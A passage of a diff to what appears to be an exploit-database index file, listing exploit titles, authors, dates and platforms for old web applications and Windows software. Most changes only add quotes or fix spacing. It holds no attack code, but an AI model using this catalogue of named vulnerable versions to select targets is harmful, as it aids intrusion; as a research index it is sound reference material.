Based Buffer Overflow",2013-07-02,"Julien Ahrens",windows,dos,0 26559,platforms/php/webapps/26559.txt,"Virtual Hosting Control System 2.2/2.4 - Error Message Cross-Site Scripting",2005-11-22,"Moritz Naumann",php,webapps,0 26560,platforms/php/webapps/26560.txt,"PmWiki 2.0.x - Search Cross-Site Scripting",2005-11-22,"Moritz Naumann",php,webapps,0 26561,platforms/php/webapps/26561.txt,"1-2-3 Music Store 1.0 - 'Process.php' SQL Injection",2005-11-23,r0t,php,webapps,0 @@ -23817,7 +23819,7 @@ id,file,description,date,author,platform,type,port 26694,platforms/php/webapps/26694.txt,"PHPMyChat 0.14.6 - start_page.css.php medium Parameter Cross-Site Scripting",2005-12-01,"Louis Wang",php,webapps,0 26695,platforms/php/webapps/26695.txt,"PHPMyChat 0.14.6 - style.css.php medium Parameter Cross-Site Scripting",2005-12-01,"Louis Wang",php,webapps,0 26696,platforms/php/webapps/26696.txt,"PHPMyChat 0.14.6 - users_popupL.php From Parameter Cross-Site Scripting",2005-12-01,"Louis Wang",php,webapps,0 -26697,platforms/php/webapps/26697.php,"PHPX 3.5.x - Admin login.php SQL Injection",2005-11-30,rgod,php,webapps,0 +26697,platforms/php/webapps/26697.php,"PHPX 3.5.x - Admin 'login.php' SQL Injection",2005-11-30,rgod,php,webapps,0 26698,platforms/php/webapps/26698.txt,"NetClassifieds Standard 1.9/Professional 1.5/Premium 1.0 - gallery.php CatID Parameter SQL Injection",2005-12-02,r0t,php,webapps,0 26699,platforms/php/webapps/26699.txt,"NetClassifieds Standard 1.9/Professional 1.5/Premium 1.0 - ViewItem.php ItemNum Parameter SQL Injection",2005-12-02,r0t,php,webapps,0 26700,platforms/jsp/webapps/26700.txt,"Java Search Engine 0.9.34 - search.jsp Cross-Site Scripting",2005-12-02,r0t,jsp,webapps,0 @@ -23875,7 +23877,7 @@ id,file,description,date,author,platform,type,port 26755,platforms/php/webapps/26755.txt,"Thwboard Beta 2.8 - calendar.php year Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0 26756,platforms/php/webapps/26756.txt,"Thwboard Beta 2.8 - v_profile.php user Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0 26757,platforms/php/webapps/26757.txt,"Thwboard Beta 2.8 - misc.php userid Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0 -26758,platforms/php/webapps/26758.txt,"DRZES Hms 3.2 - login.php Cross-Site Scripting",2005-12-07,Vipsta,php,webapps,0 +26758,platforms/php/webapps/26758.txt,"DRZES Hms 3.2 - 'login.php' Cross-Site Scripting",2005-12-07,Vipsta,php,webapps,0 26759,platforms/asp/webapps/26759.txt,"ASPMForum - forum.asp baslik Parameter SQL Injection",2005-12-07,dj_eyes2005,asp,webapps,0 26760,platforms/asp/webapps/26760.txt,"ASPMForum - kullanicilistesi.asp harf Parameter SQL Injection",2005-12-07,dj_eyes2005,asp,webapps,0 26761,platforms/cgi/webapps/26761.txt,"Dell TrueMobile 2300 - Remote Credential Reset",2005-12-07,TNull,cgi,webapps,0 @@ -24039,16 +24041,16 @@ id,file,description,date,author,platform,type,port 26923,platforms/php/webapps/26923.txt,"Beehive Forum 0.6.2 - Multiple HTML Injection Vulnerabilities",2005-12-21,"Alireza Hassani",php,webapps,0 26924,platforms/jsp/webapps/26924.txt,"OpenEdit 4.0 - Results.HTML Cross-Site Scripting",2005-12-21,r0t3d3Vil,jsp,webapps,0 26925,platforms/php/webapps/26925.txt,"Papaya CMS 4.0.4 - Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0 -26926,platforms/asp/webapps/26926.txt,"PortalApp 3.3/4.0 - login.asp Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 -26927,platforms/asp/webapps/26927.txt,"SiteEnable 3.3 - login.asp Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 -26928,platforms/asp/webapps/26928.txt,"IntranetApp 3.3 - login.asp ret_page Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 +26926,platforms/asp/webapps/26926.txt,"PortalApp 3.3/4.0 - 'login.asp' Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 +26927,platforms/asp/webapps/26927.txt,"SiteEnable 3.3 - 'login.asp' Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 +26928,platforms/asp/webapps/26928.txt,"IntranetApp 3.3 - 'login.asp' ret_page Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26929,platforms/asp/webapps/26929.txt,"IntranetApp 3.3 - content.asp Multiple Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26930,platforms/asp/webapps/26930.txt,"ProjectApp 3.3 - forums.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26931,platforms/asp/webapps/26931.txt,"ProjectApp 3.3 - search_employees.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26932,platforms/asp/webapps/26932.txt,"ProjectApp 3.3 - cat.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26933,platforms/cgi/webapps/26933.txt,"ProjectApp 3.3 - links.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,cgi,webapps,0 26934,platforms/asp/webapps/26934.txt,"ProjectApp 3.3 - pmprojects.asp projectid Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 -26935,platforms/asp/webapps/26935.txt,"ProjectApp 3.3 - login.asp ret_page Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 +26935,platforms/asp/webapps/26935.txt,"ProjectApp 3.3 - 'login.asp' ret_page Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26936,platforms/asp/webapps/26936.txt,"ProjectApp 3.3 - default.asp skin_number Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26937,platforms/cgi/webapps/26937.txt,"ComputerOil Redakto CMS 3.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,cgi,webapps,0 26938,platforms/php/webapps/26938.txt,"Scoop 1.1 RC1 - Search Module Multiple Parameter Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0 @@ -24127,7 +24129,7 @@ id,file,description,date,author,platform,type,port 27441,platforms/php/webapps/27441.txt,"Invision Power Services Invision Board 2.0.4 - Help Action HID Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 27442,platforms/php/webapps/27442.txt,"Invision Power Services Invision Board 2.0.4 - Members Action Multiple Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 27009,platforms/php/webapps/27009.txt,"MLM (Multi Level Marketing) Script - Multiple Vulnerabilities",2013-07-22,3spi0n,php,webapps,0 -27010,platforms/windows/dos/27010.txt,"VbsEdit 5.9.3 - '.smi'Buffer Overflow",2013-07-22,d3b4g,windows,dos,0 +27010,platforms/windows/dos/27010.txt,"VbsEdit 5.9.3 - '.smi' Buffer Overflow",2013-07-22,d3b4g,windows,dos,0 27011,platforms/jsp/webapps/27011.txt,"Sybase EAServer 6.3.1 - Multiple Vulnerabilities",2013-07-22,"SEC Consult",jsp,webapps,0 27012,platforms/windows/remote/27012.rb,"Apple Quicktime 7 - Invalid Atom Length Buffer Overflow",2013-07-22,Metasploit,windows,remote,0 27013,platforms/windows/remote/27013.rb,"HP Managed Printing Administration - jobAcct Remote Command Execution",2013-07-22,Metasploit,windows,remote,0 @@ -24167,9 +24169,9 @@ id,file,description,date,author,platform,type,port 27044,platforms/hardware/remote/27044.rb,"D-Link Devices - UPnP SOAP Command Execution",2013-07-23,Metasploit,hardware,remote,0 27045,platforms/linux/remote/27045.rb,"Foreman (Red Hat OpenStack/Satellite) - bookmarks/create Code Injection",2013-07-23,Metasploit,linux,remote,443 27046,platforms/windows/remote/27046.rb,"VMware vCenter - Chargeback Manager ImageUploadServlet Arbitrary File Upload",2013-07-23,Metasploit,windows,remote,443 -27047,platforms/windows/dos/27047.txt,"Artweaver 3.1.5 - '.awd'Buffer Overflow",2013-07-23,"Core Security",windows,dos,0 +27047,platforms/windows/dos/27047.txt,"Artweaver 3.1.5 - '.awd' Buffer Overflow",2013-07-23,"Core Security",windows,dos,0 27048,platforms/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Inclusion",2006-01-09,Xez,php,webapps,0 -27049,platforms/windows/dos/27049.txt,"XnView 2.03 - '.pct'Buffer Overflow",2013-07-23,"Core Security",windows,dos,0 +27049,platforms/windows/dos/27049.txt,"XnView 2.03 - '.pct' Buffer Overflow",2013-07-23,"Core Security",windows,dos,0 27050,platforms/windows/dos/27050.txt,"DirectShow - Arbitrary Memory Overwrite (MS13-056)",2013-07-23,"Andrés Gómez Ramírez",windows,dos,0 27051,platforms/windows/dos/27051.txt,"Microsoft Windows - Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities",2006-01-09,cocoruder,windows,dos,0 27052,platforms/php/webapps/27052.txt,"427BB 2.2 - showthread.php SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24224,7 +24226,7 @@ id,file,description,date,author,platform,type,port 27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' search Parameter Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0 27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - search.php search Parameter Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0 27104,platforms/php/webapps/27104.txt,"aoblogger 2.3 - url BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 -27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 - login.php username Field SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 +27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 - 'login.php' username Field SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27107,platforms/php/webapps/27107.txt,"PHPXplorer 0.9.33 - action.php Directory Traversal",2006-01-16,liz0,php,webapps,0 27108,platforms/multiple/dos/27108.txt,"Dual DHCP DNS Server 1.0 - DHCP Options Remote Buffer Overflow",2006-01-07,"Luigi Auriemma",multiple,dos,0 @@ -24233,7 +24235,7 @@ id,file,description,date,author,platform,type,port 27111,platforms/php/webapps/27111.txt,"Eggblog 2.0 - topic.php message Parameter Cross-Site Scripting",2006-01-18,alex@evuln.com,php,webapps,0 27112,platforms/php/webapps/27112.txt,"SaralBlog 1.0 - Multiple Input Validation Vulnerabilities",2006-01-18,"Aliaksandr Hartsuyeu",php,webapps,0 27113,platforms/windows/dos/27113.c,"BitComet 0.60 - .Torrent File Handling Remote Buffer Overflow",2006-01-19,"Dejun Meng",windows,dos,0 -27114,platforms/php/webapps/27114.txt,"WebspotBlogging 3.0 - login.php SQL Injection",2006-01-19,"Aliaksandr Hartsuyeu",php,webapps,0 +27114,platforms/php/webapps/27114.txt,"WebspotBlogging 3.0 - 'login.php' SQL Injection",2006-01-19,"Aliaksandr Hartsuyeu",php,webapps,0 27115,platforms/cgi/webapps/27115.txt,"Rockliffe MailSite 5.3.4/6.1.22/7.0.3 - HTTP Mail Management Cross-Site Scripting",2006-01-20,"OS2A BTO",cgi,webapps,0 27116,platforms/php/webapps/27116.txt,"NewsPHP - 'index.php' Multiple SQL Injection",2006-01-23,SAUDI,php,webapps,0 27117,platforms/php/webapps/27117.txt,"BlogPHP 1.2 - Multiple SQL Injections",2006-01-20,imei,php,webapps,0 @@ -24244,7 +24246,7 @@ id,file,description,date,author,platform,type,port 27122,platforms/php/webapps/27122.txt,"MyBB 1.0.1/1.0.2 - Notepad usercp.php HTML Injection",2006-01-24,"Roozbeh Afrasiabi",php,webapps,0 27123,platforms/php/webapps/27123.txt,"Pixelpost 1.4.3 - User Comment HTML Injection",2006-01-24,"Aliaksandr Hartsuyeu",php,webapps,0 27124,platforms/php/webapps/27124.txt,"SleeperChat 0.3f - 'index.php' Cross-Site Scripting",2006-01-24,hackologie,php,webapps,0 -27125,platforms/php/webapps/27125.txt,"miniBloggie 1.0 - login.php SQL Injection",2006-01-24,"Aliaksandr Hartsuyeu",php,webapps,0 +27125,platforms/php/webapps/27125.txt,"miniBloggie 1.0 - 'login.php' SQL Injection",2006-01-24,"Aliaksandr Hartsuyeu",php,webapps,0 27126,platforms/php/webapps/27126.txt,"CheesyBlog 1.0 - Multiple HTML Injection Vulnerabilities",2006-01-25,"Aliaksandr Hartsuyeu",php,webapps,0 27127,platforms/php/webapps/27127.txt,"PMachine ExpressionEngine 1.4.1 - HTTP Referrer HTML Injection",2006-01-25,"Aliaksandr Hartsuyeu",php,webapps,0 27128,platforms/php/webapps/27128.txt,"Windu CMS 2.2 - Multiple Vulnerabilities",2013-07-27,LiquidWorm,php,webapps,0 @@ -24261,7 +24263,7 @@ id,file,description,date,author,platform,type,port 27139,platforms/php/webapps/27139.txt,"My Little Homepage Products - BBCode Link Tag Script Injection",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 27140,platforms/multiple/dos/27140.txt,"Exiv2 - Corrupted EXIF Data Denial of Service",2006-01-26,"Maciek Wierciski",multiple,dos,0 27141,platforms/cgi/webapps/27141.txt,"Elido Face Control - Multiple Directory Traversal Vulnerabilities",2006-01-26,"HSC Security Group",cgi,webapps,0 -27142,platforms/asp/webapps/27142.txt,"ASPThai Forums 8.0 - login.asp SQL Injection",2006-01-19,code.shell,asp,webapps,0 +27142,platforms/asp/webapps/27142.txt,"ASPThai Forums 8.0 - 'login.asp' SQL Injection",2006-01-19,code.shell,asp,webapps,0 27143,platforms/asp/webapps/27143.txt,"ZixForum 1.12 - forum.asp Multiple SQL Injection",2005-12-15,"Tran Viet Phuong",asp,webapps,0 27144,platforms/linux/dos/27144.py,"Communigate Pro 5.0.6 - Server LDAP Denial of Service",2006-01-28,"Evgeny Legerov",linux,dos,0 27145,platforms/linux/dos/27145.txt,"GNOME Evolution 2.2.3/2.3.x - Inline XML File Attachment Buffer Overflow",2006-01-28,"Mike Davis",linux,dos,0 @@ -24298,7 +24300,7 @@ id,file,description,date,author,platform,type,port 27176,platforms/php/webapps/27176.txt,"Papoo 2.1.x - Multiple Cross-Site Scripting Vulnerabilities",2006-02-09,"Dj Eyes",php,webapps,0 27177,platforms/hardware/webapps/27177.html,"TRENDnet TEW-812DRU - Cross-Site Request Forgery/Command Injection Root Exploit",2013-07-28,"Jacob Holcomb",hardware,webapps,0 27361,platforms/php/webapps/27361.txt,"Invision Power Board 2.1.5 - Showtopic SQL Injection",2006-03-06,Mr.SNAKE,php,webapps,0 -27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell (Port 4444) shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0 +27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell (Port 4444) Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0 27181,platforms/multiple/remote/27181.txt,"IBM Lotus Domino 6.x/7.0 - iNotes javascript: Filter Bypass",2006-02-10,"Jakob Balle",multiple,remote,0 27182,platforms/multiple/remote/27182.txt,"IBM Lotus Domino 6.x/7.0 iNotes - Email Subject Cross-Site Scripting",2006-02-10,"Jakob Balle",multiple,remote,0 27183,platforms/php/webapps/27183.txt,"FarsiNews 2.1/2.5 - show_archives.php template Parameter Traversal Arbitrary File Access",2006-02-10,"Hamid Ebadi",php,webapps,0 @@ -24323,7 +24325,7 @@ id,file,description,date,author,platform,type,port 27202,platforms/php/webapps/27202.txt,"Lawrence Osiris DB_eSession 1.0.2 - Class SQL Injection",2006-02-13,"GulfTech Security",php,webapps,0 27203,platforms/hardware/remote/27203.pl,"Fortinet FortiGate 2.x/3.0 - URL Filtering Bypass",2006-02-13,"Mathieu Dessus",hardware,remote,0 27204,platforms/php/webapps/27204.html,"Virtual Hosting Control System 2.2/2.4 - change_password.php Current Password",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 -27205,platforms/php/webapps/27205.html,"Virtual Hosting Control System 2.2/2.4 - login.php check_login() Function Authentication Bypass",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 +27205,platforms/php/webapps/27205.html,"Virtual Hosting Control System 2.2/2.4 - 'login.php' check_login() Function Authentication Bypass",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 27206,platforms/php/webapps/27206.txt,"XMB Forum 1.8/1.9 - u2u.php username Parameter Cross-Site Scripting",2006-02-13,"James Bercegay",php,webapps,0 27207,platforms/php/webapps/27207.txt,"Clever Copy 2.0/3.0 - Multiple HTML Injection Vulnerabilities",2006-02-13,"Aliaksandr Hartsuyeu",php,webapps,0 27208,platforms/php/webapps/27208.txt,"PHP-Nuke 6.x/7.x - header.php Pagetitle Parameter Cross-Site Scripting",2006-02-13,"Janek Vind",php,webapps,0 @@ -24361,7 +24363,7 @@ id,file,description,date,author,platform,type,port 27240,platforms/php/webapps/27240.txt,"MyBB 1.0.2/1.0.3 - Managegroup.php SQL Injection",2006-02-16,imei,php,webapps,0 27241,platforms/hardware/dos/27241.c,"D-Link DWL-G700AP 2.00/2.01 - HTTPD Denial of Service",2006-02-16,l0om,hardware,dos,0 27242,platforms/php/webapps/27242.txt,"MyBB 1.0.3 - Managegroup.php Cross-Site Scripting",2006-02-16,imei,php,webapps,0 -27243,platforms/php/webapps/27243.txt,"Siteframe Beaumont 5.0.1/5.0.2 - page.php HTML Injection",2006-02-16,federico.alice@tiscali.it,php,webapps,0 +27243,platforms/php/webapps/27243.txt,"Siteframe Beaumont 5.0.1/5.0.2 - 'page.php' HTML Injection",2006-02-16,federico.alice@tiscali.it,php,webapps,0 27244,platforms/linux/remote/27244.txt,"Wimpy MP3 Player 5 - Text File Overwrite",2006-02-16,ReZEN,linux,remote,0 27245,platforms/php/webapps/27245.txt,"V-webmail 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-17,$um$id,php,webapps,0 27246,platforms/linux/dos/27246.txt,"Mozilla Thunderbird 1.5 - Address Book Import Remote Denial of Service",2006-02-17,DrFrancky,linux,dos,0 @@ -24394,7 +24396,7 @@ id,file,description,date,author,platform,type,port 27271,platforms/windows/remote/27271.rb,"HP Data Protector - CMD Install Service (Metasploit)",2013-08-02,"Ben Turner",windows,remote,0 27272,platforms/php/webapps/27272.txt,"SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload",2013-08-02,spyk2r,php,webapps,0 27273,platforms/windows/dos/27273.txt,"TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) Crash (PoC)",2013-08-02,d3b4g,windows,dos,0 -27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php rang parameter'SQL Injection",2013-08-02,Raw-x,php,webapps,0 +27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php rang parameter' SQL Injection",2013-08-02,Raw-x,php,webapps,0 27275,platforms/php/webapps/27275.txt,"FunGamez - Remote File Upload",2013-08-02,"cr4wl3r ",php,webapps,0 27276,platforms/php/webapps/27276.html,"Bigace CMS 2.7.8 - Add Admin Account Cross-Site Request Forgery",2013-08-02,"Yashar shahinzadeh",php,webapps,0 27277,platforms/windows/remote/27277.py,"PCMAN FTP 2.07 - PASS Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 @@ -24477,7 +24479,7 @@ id,file,description,date,author,platform,type,port 27355,platforms/php/webapps/27355.txt,"Woltlab Burning Board 2.3.4 - misc.php Cross-Site Scripting",2006-03-04,r57shell,php,webapps,0 27362,platforms/php/webapps/27362.txt,"Bitweaver 1.1/1.2 - Title Field HTML Injection",2006-03-06,Kiki,php,webapps,0 27363,platforms/php/webapps/27363.txt,"PHORUM 3.x/5.x - Common.php Remote File Inclusion",2006-03-06,ERNE,php,webapps,0 -27364,platforms/php/webapps/27364.txt,"Game-Panel 2.6 - login.php Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 +27364,platforms/php/webapps/27364.txt,"Game-Panel 2.6 - 'login.php' Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 27365,platforms/multiple/dos/27365.txt,"Monopd 0.9.3 - Remote Denial of Service",2006-03-06,"Luigi Auriemma",multiple,dos,0 27557,platforms/php/webapps/27557.pl,"PHPSelect Submit-A-Link - HTML Injection",2006-04-01,s3rv3r_hack3r,php,webapps,0 27367,platforms/php/webapps/27367.txt,"Link Bank - Iframe.php Cross-Site Scripting",2006-03-07,Retard,php,webapps,0 @@ -24522,7 +24524,7 @@ id,file,description,date,author,platform,type,port 27407,platforms/windows/dos/27407.pl,"UnrealIRCd 3.x - Remote Denial of Service",2006-03-09,"Brandon Milner",windows,dos,0 27408,platforms/php/webapps/27408.txt,"txtForum 1.0.3/1.0.4 - Remote PHP Script Code Injection",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 27409,platforms/php/webapps/27409.txt,"QwikiWiki 1.4/1.5 - 'index.php' Multiple Parameter Cross-Site Scripting",2006-03-10,Kiki,php,webapps,0 -27410,platforms/php/webapps/27410.txt,"QwikiWiki 1.4/1.5 - login.php Multiple Parameter Cross-Site Scripting",2006-03-10,Kiki,php,webapps,0 +27410,platforms/php/webapps/27410.txt,"QwikiWiki 1.4/1.5 - 'login.php' Multiple Parameter Cross-Site Scripting",2006-03-10,Kiki,php,webapps,0 27411,platforms/php/webapps/27411.txt,"QwikiWiki 1.4/1.5 - pageindex.php help Parameter Cross-Site Scripting",2006-03-10,Kiki,php,webapps,0 27412,platforms/php/webapps/27412.txt,"QwikiWiki 1.4/1.5 - recentchanges.php help Parameter Cross-Site Scripting",2006-03-10,Kiki,php,webapps,0 27413,platforms/php/webapps/27413.txt,"Core News 2.0.1 - 'index.php' Remote Code Execution",2006-03-10,botan,php,webapps,0 @@ -24550,8 +24552,8 @@ id,file,description,date,author,platform,type,port 27445,platforms/php/webapps/27445.txt,"MusicBox 2.3 - 'index.php' Multiple Parameter SQL Injection",2006-03-18,Linux_Drox,php,webapps,0 27446,platforms/php/webapps/27446.txt,"MusicBox 2.3 - 'index.php' Multiple Parameter Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0 27447,platforms/php/webapps/27447.txt,"MusicBox 2.3 - cart.php Multiple Parameter Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0 -27448,platforms/php/webapps/27448.txt,"PHPWebsite 0.8.2/0.8.3 - friend.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0 -27449,platforms/php/webapps/27449.txt,"PHPWebsite 0.8.2/0.8.3 - article.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0 +27448,platforms/php/webapps/27448.txt,"phpWebSite 0.8.2/0.8.3 - friend.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0 +27449,platforms/php/webapps/27449.txt,"phpWebSite 0.8.2/0.8.3 - article.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0 27450,platforms/php/webapps/27450.txt,"WinHKI 1.4/1.5/1.6 - Remote Directory Traversal",2006-02-24,raphael.huck@free.fr,php,webapps,0 27451,platforms/cgi/webapps/27451.txt,"Verisign MPKI 6.0 - Haydn.exe Cross-Site Scripting",2006-03-20,"Alberto Soli",cgi,webapps,0 27452,platforms/hardware/remote/27452.txt,"F5 Firepass 4100 SSL VPN - Cross-Site Scripting",2006-03-21,"ILION Research",hardware,remote,0 @@ -24611,11 +24613,11 @@ id,file,description,date,author,platform,type,port 27509,platforms/php/webapps/27509.txt,"OneOrZero 1.6.3 Helpdesk - 'index.php' SQL Injection",2006-03-28,Preddy,php,webapps,0 27510,platforms/php/webapps/27510.txt,"PhxContacts 0.93 - carnet.php Multiple Parameter SQL Injection",2006-03-29,"Morocco Security Team",php,webapps,0 27511,platforms/php/webapps/27511.txt,"PhxContacts 0.93 - contact_view.php id_contact Parameter SQL Injection",2006-03-29,"Morocco Security Team",php,webapps,0 -27512,platforms/php/webapps/27512.txt,"PhxContacts 0.93 - login.php Cross-Site Scripting",2006-03-29,DaBDouB-MoSiKaR,php,webapps,0 +27512,platforms/php/webapps/27512.txt,"PhxContacts 0.93 - 'login.php' Cross-Site Scripting",2006-03-29,DaBDouB-MoSiKaR,php,webapps,0 27513,platforms/php/webapps/27513.txt,"VNews 1.2 - Multiple SQL Injections",2006-03-30,"Aliaksandr Hartsuyeu",php,webapps,0 27514,platforms/php/webapps/27514.txt,"Tribq CMS 5.2.7 - Adding/Editing New Administrator Account Cross-Site Request Forgery",2013-08-12,"Yashar shahinzadeh",php,webapps,0 27515,platforms/php/webapps/27515.txt,"Open Real Estate CMS 1.5.1 - Multiple Vulnerabilities",2013-08-12,"Yashar shahinzadeh",php,webapps,0 -27518,platforms/php/webapps/27518.txt,"MLMAuction Script - 'gallery.php id parameter'SQL Injection",2013-08-12,3spi0n,php,webapps,0 +27518,platforms/php/webapps/27518.txt,"MLMAuction Script - 'gallery.php id parameter' SQL Injection",2013-08-12,3spi0n,php,webapps,0 27519,platforms/php/webapps/27519.txt,"phpVID 1.2.3 - Multiple Vulnerabilities",2013-08-12,3spi0n,php,webapps,0 27729,platforms/php/webapps/27729.txt,"Scry Gallery 1.1 - 'index.php' Cross-Site Scripting",2006-04-24,mayank,php,webapps,0 27521,platforms/php/webapps/27521.txt,"Ajax PHP Penny Auction 1.x 2.x - Multiple Vulnerabilities",2013-08-12,"Taha Hunter",php,webapps,80 @@ -24635,7 +24637,7 @@ id,file,description,date,author,platform,type,port 27536,platforms/asp/webapps/27536.txt,"SiteSearch Indexer 3.5 - searchresults.asp Cross-Site Scripting",2006-03-31,r0t,asp,webapps,0 27537,platforms/php/webapps/27537.txt,"Warcraft III Replay Parser for PHP 1.8.c - 'index.php' Remote File Inclusion",2006-03-31,botan,php,webapps,0 27538,platforms/php/webapps/27538.txt,"RedCMS 0.1 - profile.php u Parameter SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 -27539,platforms/php/webapps/27539.txt,"RedCMS 0.1 - login.php Multiple Parameter SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 +27539,platforms/php/webapps/27539.txt,"RedCMS 0.1 - 'login.php' Multiple Parameter SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 27540,platforms/php/webapps/27540.txt,"RedCMS 0.1 - register.php Multiple Field Cross-Site Scripting",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 27727,platforms/windows/dos/27727.txt,"Microsoft Internet Explorer 6.0 - Nested OBJECT Tag Memory Corruption",2006-04-22,"Michal Zalewski",windows,dos,0 27544,platforms/php/webapps/27544.txt,"SoftBiz Image Gallery - suggest_image.php cid Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 @@ -24704,7 +24706,7 @@ id,file,description,date,author,platform,type,port 27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow",2013-08-15,Metasploit,windows,local,0 27610,platforms/php/remote/27610.rb,"Joomla Media Manager - Arbitrary File Upload",2013-08-15,Metasploit,php,remote,80 27611,platforms/windows/remote/27611.txt,"Oracle Java - IntegerInterleavedRaster.verify() Signed Integer Overflow",2013-08-15,"Packet Storm",windows,remote,0 -27612,platforms/php/webapps/27612.txt,"ShopWeezle 2.0 - login.php itemID Parameter SQL Injection",2006-04-10,r0t,php,webapps,0 +27612,platforms/php/webapps/27612.txt,"ShopWeezle 2.0 - 'login.php' itemID Parameter SQL Injection",2006-04-10,r0t,php,webapps,0 27613,platforms/php/webapps/27613.txt,"ShopWeezle 2.0 - 'index.php' Multiple Parameter SQL Injection",2006-04-10,r0t,php,webapps,0 27614,platforms/php/webapps/27614.txt,"ShopWeezle 2.0 - memo.php itemID Parameter SQL Injection",2006-04-10,r0t,php,webapps,0 27615,platforms/php/webapps/27615.txt,"AzDGVote - Remote File Inclusion",2006-04-11,SnIpEr_SA,php,webapps,0 @@ -24778,7 +24780,7 @@ id,file,description,date,author,platform,type,port 27685,platforms/cgi/webapps/27685.txt,"IntelliLink Pro 5.06 - addlink_lwp.cgi url Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 27686,platforms/cgi/webapps/27686.txt,"IntelliLink Pro 5.06 - edit.cgi Multiple Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 27687,platforms/php/webapps/27687.txt,"ThWboard 2.8 - Showtopic.php SQL Injection",2006-04-19,Qex,php,webapps,0 -27688,platforms/php/webapps/27688.txt,"ContentBoxx - login.php Cross-Site Scripting",2006-04-19,botan,php,webapps,0 +27688,platforms/php/webapps/27688.txt,"ContentBoxx - 'login.php' Cross-Site Scripting",2006-04-19,botan,php,webapps,0 27689,platforms/cgi/webapps/27689.txt,"BannerFarm 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 27690,platforms/cgi/webapps/27690.txt,"xFlow 5.46.11 - index.cgi Multiple Parameter SQL Injection",2006-04-19,r0t,cgi,webapps,0 27691,platforms/cgi/webapps/27691.txt,"xFlow 5.46.11 - index.cgi Multiple Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 @@ -24870,7 +24872,7 @@ id,file,description,date,author,platform,type,port 27771,platforms/php/webapps/27771.txt,"Ovidentia 7.9.4 - Multiple Vulnerabilities",2013-08-22,LiquidWorm,php,webapps,80 27855,platforms/php/webapps/27855.txt,"Vizra - A_Login.php Cross-Site Scripting",2006-05-11,R00TT3R,php,webapps,0 27856,platforms/linux/dos/27856.txt,"GNU BinUtils 2.1x - Buffer Overflow",2006-05-11,"Jesus Olmos 